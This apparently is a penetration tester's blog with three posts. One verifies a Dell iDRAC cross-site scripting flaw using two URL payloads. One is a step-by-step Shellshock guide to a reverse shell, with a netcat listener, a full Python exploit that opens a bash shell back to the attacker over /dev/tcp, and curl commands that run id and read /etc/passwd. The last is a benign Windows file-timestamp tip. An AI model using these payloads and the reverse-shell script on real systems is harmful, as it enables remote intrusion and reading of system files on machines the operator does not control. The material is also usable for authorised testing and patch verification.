Thursday, March 19, 2015

How to verify CVE-2013-3589 (Dell iDRAC 6 and iDRAC 7 XSS Vulnerability)


1.   Nessus description:

The remote Dell Remote Access Controller (iDRAC6 / iDRAC7) is affected by a cross-site scripting vulnerability. The login page does not properly sanitize user-supplied input to the 'ErrorMsg' parameter. An attacker could leverage this to inject arbitrary HTML and script code into a user's browser to be executed within the security context of the affected site.

2.   Demonstration:

1) Actually the login page does filter some Java scripts, so if you use the common script like <script>alert(1)</script>, it won’t work.
2) Example 1: pop up a javascript window.
https://192.168.xxx.xxx/login.html?ErrorMsg=%3Cimg%20src=asdf%20onerror=alert%28%22XSS%22%29%3E





3) Example 2: redirect to https://google.com
https://192.168.xxx.xxx/login.html?ErrorMsg="><img src=x onerror=window.open('https://google.com/');>

3.   Recommendation

1) Upgrade to firmware version 1.96 (iDRAC6) / 1.46.45 (iDRAC7) or later.

4.   References:

1). http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3589
2). http://www.tenable.com/plugins/index.php?view=single&id=70411

Monday, October 20, 2014

How to get reverse shell with BASH (shellshock) vulnerability?

Pre-require:
1. Kali Linux
2.  Download the python code from http://pastebin.com/166f8Rjx and save as “shellshock.py”

3. If you are trying to attack an https site, change line 12 to conn = httplib.HTTPSConnection(sys.argv[1]), here I save it as “shellshocks.py”


4. Your Kali Linux IP
5. The vulnerable host IP


Steps

1. Run command “nc –lvp 9999”, listening on port 9999, you can change the port number if you want.

  
2. Open another window and run command “python shellshocks.py 10.10.x.x /ucsm/isSamInstalled.cgi 172.16.x.x/9999”. 10.10.x.x is the vulnerable host. 172.16.x.x is my Kali Linux IP.


3. Now you can get the shell:



Some commands that can be used to verify Shellshock:
1. curl --insecure -H "User-Agent: () { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id" https://10.10.x.x/ucsm/isSamInstalled.cgi
2. curl --insecure -H "User-Agent: () { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /bin/cat /etc/passwd" https://10.10.x.x/ucsm/isSamInstalled.cgi
3. curl --insecure -A "X: () { :;}; echo; /bin/cat /etc/passwd; 2>&1; exit" https://10.10.x.x/ucsm/isSamInstalled.cgi

Appendix: the source code (from http://pastebin.com/166f8Rjx)
#
#CVE-2014-6271 cgi-bin reverse shell
#

import httplib,urllib,sys

if (len(sys.argv)<4 br="">    print "Usage: %s " % sys.argv[0]
    print "Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0]
    exit(0)

conn = httplib.HTTPConnection(sys.argv[1])
reverse_shell="() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3]

headers = {"Content-type": "application/x-www-form-urlencoded",
    "test":reverse_shell }
conn.request("GET",sys.argv[2],headers=headers)
res = conn.getresponse()
print res.status, res.reason
data = res.read()
print data

Wednesday, August 13, 2014

Change file timestamp in Windows

Sometimes you need to modify a file’s timestamp and don’t want to change the content of the file. Copy command has an easy way to do it:

copy /b filename.ext +,,

This command will assign the current time and date to filename.ext without modifying the file content.  It will replace the original file, so make sure you have a backup for the file.

For reference, check: http://technet.microsoft.com/en-us/library/bb490886.aspx